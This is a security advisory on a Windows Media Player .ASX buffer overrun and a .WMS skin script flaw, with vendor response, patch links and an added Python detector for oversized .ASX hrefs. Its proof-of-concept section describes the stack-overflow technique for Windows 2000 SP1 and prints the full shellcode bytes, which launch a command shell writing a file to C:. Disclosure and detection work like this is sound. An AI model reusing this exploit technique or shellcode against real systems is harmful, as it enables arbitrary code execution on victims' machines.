Microsoft Windows Media Player plays streaming media files that have the extension .ASX. It is possible to launch a buffer overrun attack, caused by the way Windows Media Player deals with the .ASX file format when using the Web View option in Windows Explorer (enabled by default). This problem allows the execution of arbitrary computer code, and thus makes it possible to create Trojan .ASX files.
One method of exploitation requires the user to save the .ASX file down to the local machine and navigate to it via Explorer. Single clicking once on the file will cause Explorer to Auto-Preview the destination streaming media file that is specified in the .ASX file. Passing a long 'destination' to this media file will cause the buffer overrun to occur and the arbitrary code to execute.
This is another good example of why attachments from unknown sources should not be trusted (even though they are not executable files in the usual sense). This is also why systems/network administrators should evaluate the types of attachments that are allowed to be passed to users desktops even though they may not contain any executable code.
There are other methods of exploitation that could allow .ASX files to be opened automatically when a user visits a malicious web site. Configuring Internet Explorer not to run ActiveX controls can prevent this.
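A defensive check that follows from the mechanism described above (a streaming-media destination in the .ASX file long enough to overrun the parser's buffer), written here as an added example rather than code from the advisory or the vendor: it scans .ASX text for Ref href values beyond a plausible length, the kind of check a mail gateway or desktop scanner could apply to attachments. The sample .ASX content and the 255-character threshold are constructed assumptions, not values taken from the advisory.

```python
import re

# Constructed sample .ASX content (not from the advisory): one ordinary entry
# and one entry whose href is padded far beyond any plausible URL length.
BENIGN_ASX = """<ASX version="3.0">
  <Entry><Ref href="mms://media.example.net/news/clip1.wmv" /></Entry>
</ASX>"""
SUSPECT_ASX = """<ASX version="3.0">
  <Entry><Ref href="mms://media.example.net/%s" /></Entry>
</ASX>""" % ("A" * 600)

# Upper bound for an href before the file is treated as suspicious. This is an
# assumed operational threshold; the advisory does not state the buffer size.
MAX_REF_LEN = 255

# ASX element and attribute names are case-insensitive, so match accordingly.
# Captures the href value whether it is double- or single-quoted.
_REF_RE = re.compile(r'<\s*ref\b[^>]*?\bhref\s*=\s*(["\'])(.*?)\1', re.IGNORECASE)


def find_oversized_refs(asx_text, max_len=MAX_REF_LEN):
    """Return (href_length, href_prefix) for every Ref href longer than max_len."""
    findings = []
    for match in _REF_RE.finditer(asx_text):
        href = match.group(2)
        if len(href) > max_len:
            findings.append((len(href), href[:40]))
    return findings


def is_suspicious(asx_text, max_len=MAX_REF_LEN):
    """True when at least one Ref href exceeds the configured length bound."""
    return bool(find_oversized_refs(asx_text, max_len))


if __name__ == "__main__":
    for label, text in (("benign", BENIGN_ASX), ("suspect", SUSPECT_ASX)):
        print(label, find_oversized_refs(text))
```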
Credit:
The information has been provided by Ollie Whitehouse from AtStake, GFI and Microsoft Product Security.
Vulnerable systems:
Microsoft Media Player v6.xx
Microsoft Media Player v7.xx
Note: The ".ASX Buffer Overrun" affects Windows Media Player versions 6.4 and 7. The ".WMS Script Execution" affects only Windows Media Player version 7. The patch installs the correct fixes for the particular version of Windows Media Player in use.
.ASX Buffer Overrun:
Proof of Concept:
The following file once uncompressed contains 'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed within Explorer with a single click, it will cause Microsoft Explorer to create a file in the root of C: called !test!. This file will contain a directory listing of the current working directory when the proof of concept is executed. Once this proof of concept is executed, it will require Explorer.exe to be restarted.
This example has been hard coded to work with Windows 2000 (SP1) and MSVCRT.DLL v6.1.8637. Another reason why this example is service-pack specific is that the code is randomly located on the stack (so EIP can not be pointed directly to the location of the arbitrary code), EBX is located 4 bytes before EIP. The example overwrites EIP with the address of JMP EBX (FF E2, this instruction is contained in kernel32 and thus static). This in turn then tries to execute the value at EBX (which contains NOPs), then EIP (luckily this does not contain any code which alters or stops program flow) and then finally executes the arbitrary code placed on the stack. The assembly code that is executed by this example at this point is contained at the end of this advisory. Within the ASX file the example code is contained at offset 00005ce4h.
The ASX file that shows this example is contained in this .zip file:
http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip
<-----<Assembly code for proof of concept>-----
[Byte Code] [Assembly]
90 nop
8B DC mov ebx,esp
8B E3 mov esp,ebx
53 push ebx
8B DC mov ebx,esp
33 FF xor edi,edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
C6 43 E9 63 mov byte ptr [ebx-17h],63h
C6 43 EA 6D mov byte ptr [ebx-16h],6Dh
C6 43 EB 64 mov byte ptr [ebx-15h],64h
C6 43 EC 2E mov byte ptr [ebx-14h],2Eh
C6 43 ED 65 mov byte ptr [ebx-13h],65h
C6 43 EE 78 mov byte ptr [ebx-12h],78h
C6 43 EF 65 mov byte ptr [ebx-11h],65h
C6 43 F0 2F mov byte ptr [ebx-10h],2Fh
C6 43 F1 63 mov byte ptr [ebx-0Fh],63h
C6 43 F2 64 mov byte ptr [ebx-0Eh],64h
C6 43 F3 69 mov byte ptr [ebx-0Dh],69h
C6 43 F4 72 mov byte ptr [ebx-0Ch],72h
C6 43 F5 3E mov byte ptr [ebx-0Bh],3Eh
C6 43 F6 63 mov byte ptr [ebx-0Ah],63h
C6 43 F7 3A mov byte ptr [ebx-9],3Ah
C6 43 F8 5C mov byte ptr [ebx-8],5Ch
C6 43 F9 21 mov byte ptr [ebx-7],21h
C6 43 FA 74 mov byte ptr [ebx-6],74h
C6 43 FB 65 mov byte ptr [ebx-5],65h
C6 43 FC 73 mov byte ptr [ebx-4],73h
C6 43 FD 74 mov byte ptr [ebx-3],74h
C6 43 FE 21 mov byte ptr [ebx-2],21h
B8 AD AA 01 78 mov eax,7801AAADh
50 push eax
8D 43 E9 lea eax,[ebx-17h]
50 push eax
FF 53 E4 call dword ptr [ebx-1Ch]
56 push esi
BB 2D F3 E8 77 mov ebx,77E8F32Dh
FF D3 call ebx
C3 ret
<-----<End of code for proof of concept>-----
Recommendation:
The best solution is to install the vendor patch for your version of the media player. This solves this specific problem.
In general, unless you need to run ActiveX controls, it is a good idea to configure Internet Explorer not to run them. At the very least you can configure IE not to run ActiveX controls in the Internet security zone. It doesn't matter whether the controls are signed or not: as you can see from this advisory, even signed controls can have security problems.
Of course, never trust attachments from unknown sources, even data files such as the .ASX files discussed in this advisory.
Vendor Response:
Microsoft has released the following information:
The two vulnerabilities discussed below are unrelated to each other except by the fact that they both affect Windows Media Player. We packaged them in a single patch to make it more convenient for customers to apply. The vulnerabilities are:
- The ".ASX Buffer Overrun" vulnerability. Windows Media Player supports the use of Active Stream Redirector (.ASX) files to enable users to play streaming media that resides on intranet or Internet sites. However, the code that parses .ASX files has an unchecked buffer, and this could potentially enable a malicious user to run code of his choice on the machine of another user. The malicious user could either send an affected file to another user and entice her to run or preview it, or he could host such a file on a web site and cause it to launch automatically whenever a user visited the site. The code could take any action on the machine that the legitimate user herself could take.
- The ".WMS Script Execution" vulnerability. Windows Media Player 7 introduced a feature called "skins", that allows customization of the look and feel of Windows Media Player. However, a custom skin (.WMS) file could potentially include script, which would execute if Windows Media Player was run and that skin was selected. A malicious user could either send a customized skin containing script to another user and try to entice her into using it, or he could host such a file on a web site and cause it to launch automatically whenever a user visited the site. Because the code would reside on the user's local machine, it would be able to execute ActiveX controls, including ones not marked "safe for scripting". This would enable the code to take any action that can be accomplished via an ActiveX control.
Patch Availability:
- Windows Media Player 6.4:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069
- Windows Media Player 7:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067
Note: The fix for this issue also will be available as part of the next periodic update, scheduled for December 2000.